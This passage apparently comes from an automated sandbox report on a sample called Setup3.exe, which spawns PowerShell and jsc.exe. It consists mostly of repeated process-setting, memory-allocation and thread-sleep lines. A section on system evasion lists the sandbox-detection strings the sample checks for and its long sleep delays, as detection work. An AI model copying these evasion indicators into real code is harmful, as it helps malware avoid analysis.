                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Setup3.exe PID: 2792, type: MEMORYSTR
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD51D6000.00000004.00000800.00020000.00000000.sdmp, Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD51D6000.00000004.00000800.00020000.00000000.sdmp, Setup3.exe, 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\Setup3.exeMemory allocated: 1AAD3230000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Setup3.exeMemory allocated: 1AAECBE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 25E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 4790000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599325Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 300000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2346Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7175Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 2707Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 7102Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -599874s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7816Thread sleep count: 2707 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7816Thread sleep count: 7102 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -599438s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -599325s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -598985s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -598860s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -598735s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -598610s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -598485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -598360s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -598235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -598110s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -597985s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -597860s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -597735s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7796Thread sleep time: -597610s >= -30000sJump to behavior
